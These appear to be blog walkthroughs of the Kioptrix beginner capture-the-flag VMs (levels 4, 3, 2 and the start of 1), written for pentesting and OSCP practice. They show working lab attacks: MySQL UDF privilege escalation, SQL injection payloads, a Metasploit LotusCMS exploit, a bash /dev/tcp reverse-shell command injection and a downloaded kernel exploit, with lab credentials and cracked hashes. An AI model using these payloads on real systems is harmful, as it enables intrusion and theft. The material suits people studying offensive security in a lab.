DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
john@Kioptrix4:~$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
john@Kioptrix4:~$ ps -ef | grep root
root         1     0  0 Mar12 ?        00:00:01 /sbin/init
root         2     0  0 Mar12 ?        00:00:00 [kthreadd]
root         3     2  0 Mar12 ?        00:00:00 [migration/0]
root         4     2  0 Mar12 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 Mar12 ?        00:00:00 [watchdog/0]
root         6     2  0 Mar12 ?        00:00:00 [events/0]
root         7     2  0 Mar12 ?        00:00:00 [khelper]
root        41     2  0 Mar12 ?        00:00:00 [kblockd/0]
root        44     2  0 Mar12 ?        00:00:00 [kacpid]
root        45     2  0 Mar12 ?        00:00:00 [kacpi_notify]
root       170     2  0 Mar12 ?        00:00:00 [kseriod]
root       208     2  0 Mar12 ?        00:00:00 [pdflush]
root       209     2  0 Mar12 ?        00:00:00 [pdflush]
root       210     2  0 Mar12 ?        00:00:00 [kswapd0]
root       252     2  0 Mar12 ?        00:00:00 [aio/0]
root      1468     2  0 Mar12 ?        00:00:00 [ata/0]
root      1471     2  0 Mar12 ?        00:00:00 [ata_aux]
root      1480     2  0 Mar12 ?        00:00:00 [scsi_eh_0]
root      1485     2  0 Mar12 ?        00:00:00 [scsi_eh_1]
root      1498     2  0 Mar12 ?        00:00:00 [ksuspend_usbd]
root      1503     2  0 Mar12 ?        00:00:00 [khubd]
root      2359     2  0 Mar12 ?        00:00:00 [scsi_eh_2]
root      2602     2  0 Mar12 ?        00:00:00 [kjournald]
root      2769     1  0 Mar12 ?        00:00:00 /sbin/udevd --daemon
root      3042     2  0 Mar12 ?        00:00:00 [kgameportd]
root      3212     2  0 Mar12 ?        00:00:00 [kpsmoused]
root      4501     1  0 Mar12 tty4     00:00:00 /sbin/getty 38400 tty4
root      4502     1  0 Mar12 tty5     00:00:00 /sbin/getty 38400 tty5
root      4507     1  0 Mar12 tty2     00:00:00 /sbin/getty 38400 tty2
root      4509     1  0 Mar12 tty3     00:00:00 /sbin/getty 38400 tty3
root      4518     1  0 Mar12 tty6     00:00:00 /sbin/getty 38400 tty6
root      4569     1  0 Mar12 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4590     1  0 Mar12 ?        00:00:00 /usr/sbin/sshd
root      4646     1  0 Mar12 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4688  4646  0 Mar12 ?        00:00:16 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid
root      4690  4646  0 Mar12 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4763     1  0 Mar12 ?        00:00:00 /usr/sbin/nmbd -D
root      4765     1  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4779  4765  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4780     1  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4800  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4812     1  0 Mar12 ?        00:00:00 /usr/sbin/cron
root      4834     1  0 Mar12 ?        00:00:00 /usr/sbin/apache2 -k start
root      4890     1  0 Mar12 tty1     00:00:00 /sbin/getty 38400 tty1
root      4943  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4944  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      5752  4590  0 01:07 ?        00:00:00 sshd: john [priv]
john      5901  5807  0 02:26 pts/0    00:00:00 grep root
john@Kioptrix4:~$ 

I can see that MySQL is running with root privileges. Since I have ssh access to the machine lets see if I find the database credentials by accessing the configuration files.

john@Kioptrix4:~$ ls /var/www/
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
john@Kioptrix4:~$ 

Well looks like there is no password needed to access the database. What I will be attempting is since we have root access on MySQL we can execute commands(on the operating system itself) using User Defined Functions. In short, because we can access MySQL server as root, we will escalate our privileges to root using User Defined Functions. In order to perform these commands we need to make sure lib_mysqludf_sys.so is on the server. Using the whereis command I discovered that it was already installed on the server.

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
john@Kioptrix4:~$ 

Lets access the MySQL server. Looked up these tutorials which helped me out with understanding MySQL UDF more. MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux and Command execution with a MySQL UDF

john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 98586
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.08 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# whoami
root
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# hostname
Kioptrix4
root@Kioptrix4:/home/john# 

Using sys_exec I was able to run usermod which added john to the admin group and then ran sudo su to get the root shell.

Conclusion

This was tougher than the previous level but when it got tough, I used the university of google (google) for some additional help. Did several exploitations which in turn got me access to the server and then had to use MySQL to do privilege escalation to get our desired root shell. If you had any questions on anything or enjoyed the read, leave some feedback below! Well that’s it for this level. Now on to the last one!

Part 3 of the Kioptrix Series. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Link to downloading the Vm can be found here. Lets get started!!

Description from author:

It’s been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know.

After the seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges. I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.

As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com

Under Linux that would be /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to this.

Hope you enjoy Kioptrix VM Level 1.2 challenge.

452 Megs

MD5 Hash : d324ffadd8e3efc1f96447eec51901f2

Have fun

Source: http://www.kioptrix.com/blog/?p=358

Starting the pentest

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.153

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and Reconnaissance

Running a scan with nmap I found OpenSSH 4.7p1 Debian 8ubuntu1.2 is running on port 22/tcp, and Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) is running on port 80/tcp. Also, the Vm’s OS isLinux 2.6.X . I can probably guess from nmap that we will being some web exploitation.

root@kali:~# nmap -A -T4 192.168.182.153

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-02 00:00 CST
Nmap scan report for kioptrix3.com (192.168.182.153)
Host is up (0.00027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:58:63:15 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms kioptrix3.com (192.168.182.153)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
root@kali:~# 

Running Nikto, i ccould see that the web server is running phpadmin, which is a free software tool written in PHP, intended to handle the administration of MySQL over the Web (I smell an SQL injection later in the pentest).

root@kali:~# nikto -host http://192.168.182.153/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.153
+ Target Hostname:    192.168.182.153
+ Target Port:        80
+ Start Time:         2017-03-02 00:24:51 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 14:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2017-03-02 00:25:05 (GMT-6) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# 
 

I first went to the site and found out it was a blog. I already knew it had phpmyadmin because of the nikto scan, but I also found out it had a gallery.

After doing some browsing on the site, I found by going to “Ligoat Press Room” and by clicking on sorting options and photo id, I found that URL had a parameter of “id” which could signify a vulnerability to SQL injection. After putting ' after php?id=1 , the server gave us an SQL error. This site is vulnerable to a SQL injection!!

Last thing I did was check the login portal on blog site and found that it was using LotusCMS which is vulnerable to LotusCMS 3.0 eval() Remote Command Execution exploit.

Exploitation

The exploitation will be separated into 3 categories. The first will be doing a SQL injection with sqlmap, the second doing a SQL injection manually, and lastly, doing the LotusCMS 3.0 eval() Remote Command Execution Exploit. All 3 will produce the same results by getting the user credentials to the vulnerable vm (which will then be used to perform privilege escalation to get root).

SQLi using sqlmap

I will NOT be putting all the output from sqlmap! I did not want to dump so much info so i just showed the commands used and the important output. Just fyi! So now knowing that the web server is vulnerable to an SQL injection, I fired up sqlmap and ran the command below to enumerate DBMS databases.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs

Well 3 databases were available! I used the next command to see the tables on the gallery database.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery

Now we see 7 tables in the gallery database. Dev_accounts looks very interesting so lets dump all the database table entries and see what we find using the command below.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump

From the tables we can see that we got the username and password hashes for dreg and loneferret. We can ssh into the victim’s machine using these credentials but after we crack the hashes. (You can skip all the way to “Password Cracking using hashcat” if you want unless you want to learn the other methods I used to get the passwords)

Manual SQLi

So now I will be doing a SQL injection but manually instead of using sqlmap. I used a tutorial which greatly helped me out which I recommend to you all called Hacking website using SQL Injection -step by step guide. If you have any questions to how and why I used a certain SQL statement just go to that tutorial which explains more in detail or just leave me comment.
So with that covered, lets get started! We know from checking the site earlier, that it is vulnerable to an SQL injection so what I want to know next is how many columns are listed in the database and as well which columns are vulnerable. I will use the command listed below for to get this information. NOTE: Make sure to put this after the id parameter in the URL.

-1  union select 1,2,3,4,5,6--

From the output we can tell that it has 6 columns with column 2 and column 3 being vulnerable(if you want to know more on how I got this, click on the link stated earlier). Next, I will try to find the version of the database. Since we knew that column 2 is vulnerable, we will be injecting our code into that column. I will use command listed below to show exactly how its done!

-1  union select 1,version(),3,4,5,6--

SQL 5.0.51a is a version of MySQL. We now know what type of syntax the database uses. Now we need to find what tables are located in the database and their names. We will inject using the query listed below.

-1  union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--


Tables Names:

Sweet! We have all the tables on the database so lets check out dev_accounts because that one looks the most interesting. I will inject using the query listed below. Note: The CHAR() portion of the query is the name of dev_accounts. We used the tool hackbar to do the conversion so we can get the query to work.

-1  union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)--

Almost done! Lets get the database to give us the username and password using the injection query below.

-1  union select 1,group_concat(username,0x3a,password),3,4,5,6 From dev_accounts--

Bingo!! We got username and password hashes to dreg and loneferret. Now onto password cracking. (You can skip the next exploit if you want to continue on in the pentest or check out the Lotus exploit to see another way of exploiting this VM)

LotusCMS 3.0 eval() Remote Command Execution Exploit

I will use a metasploit module to for the LotusCMS 3.0 eval() Remote Command Execution exploit so we can get a shell.

msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(lcms_php_exec) > set RHOST 192.168.182.153
RHOST => 192.168.182.153
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(lcms_php_exec) > set URI /
URI => /
msf exploit(lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.153:51095) at 2017-03-03 00:51:23 -0600

whoami
www-data

So we have a shell. Lets do some looking around.

pwd
/home/www/kioptrix3.com
ls -l
total 84
drwxrwxrwx  2 root root  4096 Apr 15  2011 cache
drwxrwxrwx  8 root root  4096 Apr 14  2011 core
drwxrwxrwx  8 root root  4096 Apr 14  2011 data
-rw-r--r--  1 root root 23126 Jun  5  2009 favicon.ico
drwxr-xr-x  7 root root  4096 Apr 14  2011 gallery
-rw-r--r--  1 root root 26430 Jan 21  2007 gnu-lgpl.txt
-rw-r--r--  1 root root   399 Feb 23  2011 index.php
drwxrwxrwx 10 root root  4096 Apr 14  2011 modules
drwxrwxrwx  3 root root  4096 Apr 14  2011 style
-rw-r--r--  1 root root   243 Aug  5  2010 update.php

The gallery directory looks interesting. Lets see what’s in there.

ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php

I snooped around until i found in the gconfig.php file what we were looking for! I got the phpmyadmin credientials!

	$GLOBALS["gallarific_mysql_server"] = "localhost";
	$GLOBALS["gallarific_mysql_database"] = "gallery";
	$GLOBALS["gallarific_mysql_username"] = "root";
	$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

I input the credentials to get into the phpmyadmin application.

I then go to the gallery database. Then click on the SQL tab and enter the SQL query below.

SELECT * FROM dev_accounts


We Now have the usernames and password hashes for dreg and loneferret!

Password Cracking using hashcat

With the two passwords stored in hashes.txt I started up hashcat in order to break the passwords. The command to break the passwords is listed below.

root@kali:~# hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
5badcaf789d3d1d09794d8f021f40f0e:starwars                 
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

We found that passwords were starwars and Mast3r!

Persistance(Linux Privilege Escalation)

Lets ssh into the victim’s VM using loneferret account.

root@kali:~# ssh loneferret@kioptrix3.com
The authenticity of host 'kioptrix3.com (192.168.182.153)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com,192.168.182.153' (RSA) to the list of known hosts.
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ 

Lets check the the CompanyPolicy.README file. That looks interesting! I also ran sudo -l and whereis ht commands to see some additional info.

loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ whereis ht
ht: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ 

Found a SUID binary! So this means as our current user loneferret , we can run the ht editor as sudo and edit any file we want! Lets edit the /etc/sudoers file then! Use the commmand listed below to get into the ht text editor. Once you run the command then press F3 and then add /etc/sudoers.

loneferret@Kioptrix3:~$ sudo ht

Ok once we are in the /etc/sudoers file add /bin/sh at the end where loneferret entry is at. Then press ALT+F to save and then CTRL+Z to exit.

Now run the following for root access sudo /bin/sh

loneferret@Kioptrix3:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# hostname
Kioptrix3

Conclusion

This was hard compared to the first two and took me awhile to get root access. Took some basic SQL knowledge as well as some basic linux privilege techniques to do but I got it done. If you have any feedback you want to give, give a comment below. Well it just gets harder from here. On to the next one!

Kioptrix: Level 1.1 (#2) is the second VM of the Kioptrix series which can be found here. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification.

Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”

Lets get started!

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.152

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning

Using nmap you can see the server is running OpenSSH 3.9p1 on port 22/tcp, Apache httpd 2.0.52 on port 80/tcp, Apache httpd 2.0.52 on port 443/tcp, CUPS 1.1 on port 631/tcp, and MySQL on port 3306/tcp. It’s probable that this web server has a back-end database running SQL on it ,which might be vulnerable to an SQL injection.

root@kali:~# nmap -sS -T4 -A 192.168.182.152

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-25 14:11 CST
Nmap scan report for 192.168.182.152
Host is up (0.00019s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            621/udp  status
|_  100024  1            624/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2017-02-25T18:02:19+00:00; -2h09m45s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:5C:FF:EC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.182.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
root@kali:~# 

Exploitation (SQL and Command Injection)

Browsing to the server, I found that it displays a login page. Next, I will try to perform and SQL Injection.

I tested the login form using ‘ or ‘1’=’1 and it worked.

The reason why it probably worked was because the SQL statement is along the lines of this:

 SELECT * FROM users WHERE username='$username' AND password='$password'

Supplying the username and password with ‘ or ‘1’=’1 will turn the SQL statement into:

 SELECT username FROM users WHERE username='' or '1'='1' AND password='' or '1'='1'

Because ‘ or ‘1’=’1 always means true, this SELECT statement will log us in and return the first username for the user table.

So now we have a Ping command prompt which might be vulnerable to a Command Injection. Using the command ; id I found that the application was vulnerable to a command injection, so I also tried to see if I could get the usernames and passwords on the server. I was able to get the /etc/passwd file but didnt have access to /etc/shadow .

Knowing that the application is vulnerable to a command injection, I took it a step further and tried to get a reverse shell.
Used ncat to set up the listener to catch the reverse shell.

root@kali:~# nc -nvlp 443

Then went back to the console on the website and ran the following command to get the reverse shell:

; bash -i >& /dev/tcp/192.168.182.147/443 0>&1


I successfully got a reverse shell and as apache. I will next try to do privilege escalation to get the desired root account.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ cat /etc/*-release
CentOS release 4.5 (Final)
bash-3.00$

It looks like the server is running CentOS release 4.5 which after doing some research, I found it was vulnerable to the ‘ip_append_data()’ Ring0 Privilege Escalation exploit..

So on the the shell that we recently obtained, I used wget to download the exploit to the server.

bash-3.00$ wget https://www.exploit-db.com/download/9542 --no-check-certificate
--16:20:14--  https://www.exploit-db.com/download/9542
           => `9542'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [application/txt]

    0K ..                                                    100%   40.04 MB/s

16:20:14 (40.04 MB/s) - `9542' saved [2645/2645]

bash-3.00$ ls
9542 

Then I compiled the program, and ran the exploit to get root shell that we all desire.

bash-3.00$ ls
9542
bash-3.00$ mv 9542 9542.c
bash-3.00$ gcc 9542.c
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Feb 25 16:20 9542.c
-rwxr-xr-x  1 apache apache 6932 Feb 25 16:21 a.out
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00# 
sh-3.00# hostname
kioptrix.level2
sh-3.00# 

Straightforward and to the point. Now on to level 3!

Kioptrix Level 1 is the first in the series of five. Point of the game is to get a root shell of the vulnerable machine. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. More info that comes from the author will be listed below with the link to download the VM here.

Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”

Without further ado, lets get started.

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover I was able to find out our victim with the ip address of 192.168.182.151

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and enumeration

I used nmap to scan the victim and found it was running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 on ports 80 and 443, samba smbd on port 139, and rpcbind on port 111.

root@kali:~# nmap -sS -T4 -A 192.168.182.151

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-10 22:11 CST
Nmap scan report for 192.168.182.151
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
